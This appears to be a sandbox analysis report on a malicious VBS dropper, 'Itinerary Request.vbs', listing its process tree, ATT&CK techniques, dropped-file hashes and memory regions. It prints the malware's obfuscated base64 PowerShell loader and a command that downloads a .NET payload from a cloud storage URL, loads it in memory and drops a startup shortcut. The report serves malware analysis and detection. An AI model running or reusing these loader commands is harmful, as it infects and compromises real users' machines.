▒Zg▒w▒DE▒NwBk▒Dg▒Ng▒5▒Dk▒MQ▒x▒GQ▒LQ▒2▒D▒▒ZQ▒5▒C0▒N▒Bj▒Dk▒N▒▒t▒DM▒YgBm▒DU▒LQ▒2▒GU▒Nw▒4▒GI▒OQ▒0▒DE▒PQBu▒GU▒awBv▒HQ▒JgBh▒Gk▒Z▒Bl▒G0▒PQB0▒Gw▒YQ▒/▒HQ▒e▒B0▒C4▒awBu▒Gk▒b▒B5▒GQ▒Z▒B1▒GI▒LwBv▒C8▒bQBv▒GM▒LgB0▒G8▒c▒Bz▒H▒▒c▒Bh▒C4▒M▒▒4▒Dk▒Ng▒1▒C0▒ZQBw▒G8▒a▒▒v▒GI▒Lw▒w▒HY▒LwBt▒G8▒Yw▒u▒HM▒aQBw▒GE▒ZQBs▒Gc▒bwBv▒Gc▒LgBl▒Gc▒YQBy▒G8▒d▒Bz▒GU▒cwBh▒GI▒ZQBy▒Gk▒Zg▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒Gg▒YgBv▒HY▒e▒▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒YwBl▒HY▒cgBn▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\Itinerary Request.vbs');powershell -command $KByHL;
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4716
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$cevrg = '034';$hbovx = 'C:\Users\Admin\Downloads\Itinerary Request.vbs';[Byte[]] $uxbfe = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($uxbfe).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('f017d869911d-60e9-4c94-3bf5-6e78b941=nekot&aidem=tla?txt.knilyddub/o/moc.topsppa.08965-epoh/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $hbovx , '_______________________-------------', $cevrg, '1', 'Roda' ));"
      4⤵
      Blocklisted process makes network request
      Drops startup file
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2692
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Users\Admin\Downloads\Itinerary Request.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1732
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        5⤵
        
        PID:3876
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        5⤵
        
        PID:3968
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5488,i,11039522296309217636,15278236557044247710,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=5672 /prefetch:8
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:3480

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
1⤵
PID:1976

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:872

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Network Share Discovery

T1135

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
312B

MD5
dc37c7e5f970a97b102aa09443b0a951

SHA1
f1526efe9642121a3c4fcabd859c2d337fc144c6

SHA256
b11b9e628b7ba59e61dea7188c47864b0374d287ed6d63ec9503cf507530b000

SHA512
268b54ad2f72e0d023f16c22ecf3cb870c6170acb40acf07fc0d82b3cf8431d0baff36a54538e69f1787fbe93cfa8ffb208e6c3ac917f46a3bde3ee1edff085c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
432B

MD5
4c291bbeaf7e79cb5a9eacc2ce66ba04

SHA1
a7669ac978bc07a40b057319371a2c7e2db3c393

SHA256
6e126f7174dc2fa7b47f2f112c1344f0723c94a576f5d63b77a1e9293035fc9f

SHA512
6e94b0df91b98d44f452a96ce51c35f912654c846cede6c359bc08dd5ce3a86ec721d11db6e2af186edc99fe24e32a4495f9028f81c2eb9ee1ca933f55b958d1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
456B

MD5
441610f8af90daf2491d2cfe6a1876f1

SHA1
ed2bca24e753fcfbd888d3f8541908d9fa2b4fda

SHA256
83b5d1241ddc7dc31c8aa4bb591d48160b28f50ad244d04d73c0d868fcb80418

SHA512
8804c19924f5e3468015540f1fb566454895c891e69193dc10d5871cbd4cc590327042dcd97effeb80a669edd66aa826e8bcf1c85c3dc89492d43c32b4a90cbf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
5KB

MD5
48ef8851d8c9f9a4ead4ca6ba341af9b

SHA1
3fd879f9dc174efb17cd6815aad8f32c670e4444

SHA256
d453a8c18e78ccd872b08bdbb7ed06e57649dde0d52b8a0e7d775831e6a9298b

SHA512
b12bd860bffbfc70f8207f6692452478d24d9b696a3c8908e230bea544e146cfe47308410cb350953427d8a20e00f005c8776854c6067a1d41e58ea85a2246fd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
5KB

MD5
c2d3ae56e8cd7682ea9616ce236416fe

SHA1
d4f52db10351031f56a741a5c8fbb5fea810f227

SHA256
3e1391c3b090b011c0377b716d702079cb61e323cad67952dbe1735e7f15f55f

SHA512
aaeb0f81b1823595bf2363183cd7ed7082b326df272502c6a66d6058d484fbd71e4f55e787dfe23f1ee08c69872857cba8b2f8d0e5399c8643c91ba0b42d7e67

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
3a916cfa0254d5aa917c40a3ceff6a03

SHA1
be2c9c18097e9c0e49cc1d16266b80397fab1d91

SHA256
2fc4fa728f3b48870c41174207b9d0c19051e94115916052ddbbb5405ef66f50

SHA512
e55a5ac06e569f15978987a86a57a8568cf795abf43be641f5c61a9248ab7af9c83eeca9b5c1dbc9b8452c0e58ed844f0e9d1fc4e46b914a232b3d6ae2113052

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
859B

MD5
896aa1e4372b1177a7fa52415e3ff44d

SHA1
5c738d724b5f7da05a5ba5d2ccdb6ac14a09c82d

SHA256
36b6420bcccad8e9bc7481bdc4cf48bd1aa45e6478e6bedea7d47e4c5caada3a

SHA512
59f2defbb7ca5cbd89f3f38dbb1f58711dbf5ba7b96dd7f4849884d2fc16cec60948e189270daf33dd6f14f6c3c8b1e8c1caddaf0acaa4cc2538e5c518c9aac8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
3a7ea4e56f7629644307b54f3a9f7a5f

SHA1
b09113fe8290c8abb6f9ca018e0d3068a3c3dc88

SHA256
b49cc6420f8e25103786aaec0148690e027d2519daf245129a97d61a0bba023c

SHA512
bc705d8e2cad7eb87ae3031e688901f047bb8f17287ee3aa3c87f205d14b09d2a9575dabd692ea2547ae38d7db7f2c64b74145f1e6125fff1eca2d4488fc2186

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
d086d57e6c5c698eb5aba5c606a218f6

SHA1
afc12b66eb3c24a52b1c3ace6852e01281c34ecb

SHA256
5bc31f34c772a8f589387a7b21ead845533f9214947be2e447e9f733d1aedfe0

SHA512
24d1b55cacd34e1a0eacae68f566c2715897e4dc353578517528286e761b95d4a0d687cf17c92690b39c4ead476897f1fd4024909100911f5923a934abf65296

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
9d9622f77aecfa231613689f76a7966b

SHA1
0abed20e203119647b793dbc4802122e146e8a27

SHA256
128ea804cca3c638d23749a4b98ba27306643819ce62a3686beefe64db81f12b

SHA512
4e82fc6d7b305d524bee2df537eb07f97431f0f3d5ceecc3d794b74bd78e7e9ea1ecd8e5306532b74acedf0bd5a32089ed0c15fa95c128ed80c88a693c9a2b54

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
a582e6b251a512e26fb5e3a0decbf584

SHA1
3ef6657d94e958ae42c463a3cab0ff8c19ab590c

SHA256
18ea5ff8810d0124f2ffc54f7bfd3ee8b19fb436c9e1ebabb8a75b887aefb407

SHA512
c458a2d8eed932b1d33e9a9a80f46ad4a975126cde207ef5807c420c6470d0f22d7e9b820edd562adda5a4aee91c5209e0c83a90f30975062b06ca9d98d0fce5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
669d7d011f704ad6a16d1e6eeabd016b

SHA1
a40ad12d6b36a89472f57d3d9ec7bf994680c38f

SHA256
120e4826caf09cc351bfa8da0cc39925be6faee7f2d66ed34d9faea8745fbaed

SHA512
3f8d4dc032ec50db6a8933e5ade034877d4fb380687cca772075a6b724644f9e2f1085983bbb94a2f88eccede8561b586d273795332944ddef49ce4aeaa39474

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
831307eb05bfe5e02a2c413201026bba

SHA1
43c7c32b4713b8cc68b06ce93ad100596769a73e

SHA256
2b8a90e27b9882d1604114a8325bc83059e50a5cbe964eee002b463553bee11a

SHA512
2da3b999529e5c0dc9bada9129141d820f701ebab544dbb7fbff3e7c331c81627293f682f283c9cd181d98badf33028729a45fe85d532444980cb3f7984d18b1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
d7e9fa953377002f9775b8ec0f90d202

SHA1
3849ffb740a5f3326753e5065647fae4f82f0f72

SHA256
2b3b0556afd7d577eb936143ec0ae817e8229ae591c4478b5d463daf42d497da

SHA512
cd1aeb94ebe95ab7c60918e646786c180b615d45ff4c9bb5144aa6003e567989233a971055696ad75c8fcefc205559905cac7ba90a506cf2f71c1cdadea9de3a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
e2deb9bd9cb65e99a4fb26fd1ad41b7d

SHA1
e119d5241bf16284ca73ad1213690dada310dfea

SHA256
a6de9e381f05ad86efb2954a2a102ac2e89071056f07d40d140f79a73ede3f72

SHA512
8a6bd6369bd2d70bd3d21bf85a0941a5ca758f64d6590c21e93b7257849915bbe5028845471169fc1e9b55cab31916df9cd50c00f7248154efb136044244500f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
a7c83311d21d3042d6f3087fb0610c6a

SHA1
ab6af90aa1edba3b450070f01eca2748c3f12868

SHA256
a3f4ad54c03419c720446bd966fdc24080ecdab4872b98212291a207b08e3eb5

SHA512
683f22ead3b692838703b972799f09c37746d6fe6840a237c38212a62ae50a7d766b87597f3d224d646a696d0f03c2a6fc1bf2de39f46f0cfb0e5d5fc2a3bc21

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
91de57081b82c9b0c931d8db56505ee1

SHA1
7ae425476b35883517a8fc5bcdb3637e13435ba5

SHA256
cb2782a6108610686bd91873f4ff7c1fcd255bb6b77462a9fa25a1f14233d89b

SHA512
38f5940c3d1577bdc753d5a9ec32356ad73c66ed2fbbbb72f0928c356f71eeb7d2548b9c8401d8f0569a24ab9008e00db44678ae423b574a62c06fa8f6a60381

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
a489ee1129ca89986ae2ec93f908daba

SHA1
38340784bb97de796f76addb988e3a9be34c695d

SHA256
1e08d0b2805277194fcf990703e3d20097226a5a9a0c535e3ba6fe5d5eb56b4a

SHA512
09929a2ac94e7d38cc75ee4e5e97b3ddc825b7633126b4fc65b9b06ea9210e597295b5c285ea340d687cf2aa28fed1c5af63f53245f3b194e3bd36195038663f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
37ca72e1760ed40249dddf0542a2497b

SHA1
bf64fa2c6d7c8c9fa835914fd5eb335de7dbf833

SHA256
3aa1969645015988fd5693dbf211291c0e1072e4f3be4036acf7c79b03ade376

SHA512
17c0419ea8887b39342ac16db5a400fcf18e4e301184ea7d6fbb29319746730a0f56f3755937848645008f60dda60d08e1717b6eca68f536ff08d27ee4d2e5cb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
0fa931b0181624b3196338d67bf99b20

SHA1
d214bde07bd3b7c9a0563c9b1075cf328bb2f12d

SHA256
a0d2f960dd4a185caf909533d6f177afa693d5f4804b37199d3373c401d70248

SHA512
739831aaf9c87cd8812fd28f773ab4ad158e0d13c76283f0f4423333235d5fab89a17fdfd01c5f48156f8ef75feef8504a822bde729f6c197680530075f36ecf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
19aaaa27dfde03285800f2ec477a2101

SHA1
f2cf203bec3315fee2e8347ccf933de552793d15

SHA256
ec98829e212949fca0c26004fcfaf3af75630289f80d4f4002653f2ea9a15867

SHA512
7fa3fb7056cb4dfa870d4680b43f5b83ccaab9522780ba953fa263790b0b70d1ae238d1280a1e07961eac0d5fe741c1f5a884dd935247158c2578966eca217a6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
197KB

MD5
c9559b79e46299ca4106e906986d0b90

SHA1
8618510d0a1983600f94fd9b46ba7b18f4e7ef81

SHA256
14b3cc1491a38a197aa0900848b484659e22b6a699d7b9608f1892c061909368

SHA512
88f4fba0ed333bc04127f55cf378f3d8b07035c18af325abd9d5804ed4bcf9cf9210901adcf48b08ba2fb5205b300ce46831a1736787115fe75506b0df750859

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
197KB

MD5
5dda4b0560099decf2e2ab7bb8159c05

SHA1
3ba8d54b3e02aae5cd87d7617eea3d01eaf77477

SHA256
0e33d50c7edd7d12cc32d1788f7ad2bea6468ca2ae02a355108a4366a991a6a8

SHA512
10e9a082f1c9e73afb47f7046b6b1ad48a76918bcbd1c8042a643b222d9d7ce1157c01ef7981e351a96bfffb320ef0e633ddf91b3e5ab6a75d8e2b45fef2c0de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
af8493bcdd3e8858e865924dda8a84d9

SHA1
91b68486fafc243659a9be230bff444a8365dfe6

SHA256
375b79567679d248bf88b327e3cb256b57876739dbf7cda1ef991409b1ed730c

SHA512
6fea7151fbd5cfbf21170c7a88be7542fd87ea15616e92cfcee0c4b755acfe8a09993f7ad45b641155077b38e023f0a93db9d1c4a0693f07e2f2b456ce62201d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b8dc7faa83176428daffaf42d97a729f

SHA1
b1bcd193d9b7663a7e1f62ad3d87cad82ff24881

SHA256
6852ff8779c2df850fcc33c3e1004e204d072b1dce607660b9100f2be2c1d33e

SHA512
be43b7f8c2db75bddcf5415e0bc19eeb0a519085f8c2418241b24e8645a3caae7815897a8ea97f9167988b9a1672d90173b26fcb759a0f0f48c5cf6b165bd9a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zkhytbdp.n0n.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_______________________-------------.lnk

Filesize
1KB

MD5
700784401f2237291f80ce1d84ee0f31

SHA1
761c5530380e6eec70188231bb63afbf59ea5f1f

SHA256
d2fde5864cbc4cea54a8f4c48456d78e27841fd978dbea765f386e94d20086cf

SHA512
faf55e9409227ffe779a4a0dfe73e703f39f7a0c6fb3235b7d43d9e68c8c59d6b1ba8e4ecfcc3ce7b7549a501c3d4661436e1b7e5594d4eef50f693fb6c92fa6

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 314423.crdownload

Filesize
2.2MB

MD5
7c8ec6d3b17d8a2e00463af73a08d645

SHA1
f4be8c2ecb3d50ba991829666aba948b1dea6adb

SHA256
5d6857e96b0abb2b2e9f049a2351f3f02291989c2da1fcd51b3ab846eb579456

SHA512
0916d7aeacd0ad5b0535099c5e49b930754a547f8b1e184d07b3b876d538aaafa7c547e31d36a2a912ddb9d76121d0a6d1589830ee44f80f38db29b607cabab7

Download Submit
memory/1184-83-0x00007FFFBD983000-0x00007FFFBD985000-memory.dmp

Filesize
8KB

Download
memory/1184-140-0x00007FFFBD980000-0x00007FFFBE441000-memory.dmp

Filesize
10.8MB

Download
memory/1184-95-0x00007FFFBD980000-0x00007FFFBE441000-memory.dmp

Filesize
10.8MB

Download
memory/1184-94-0x00007FFFBD980000-0x00007FFFBE441000-memory.dmp

Filesize
10.8MB

Download
memory/1184-93-0x000002D6BCB60000-0x000002D6BCB82000-memory.dmp

Filesize
136KB

Download
memory/3452-133-0x00000155707A0000-0x00000155707AA000-memory.dmp

Filesize
40KB

Download
memory/3452-119-0x000001556FF20000-0x000001556FF28000-memory.dmp

Filesize
32KB

Download
memory/3992-134-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/3992-205-0x0000000006EF0000-0x0000000007494000-memory.dmp

Filesize
5.6MB

Download
memory/3992-204-0x00000000068A0000-0x0000000006932000-memory.dmp

Filesize
584KB

Download
memory/3992-185-0x0000000005DF0000-0x0000000005E56000-memory.dmp

Filesize
408KB

Download
memory/3992-141-0x0000000005550000-0x00000000055EC000-memory.dmp

Filesize
624KB

Download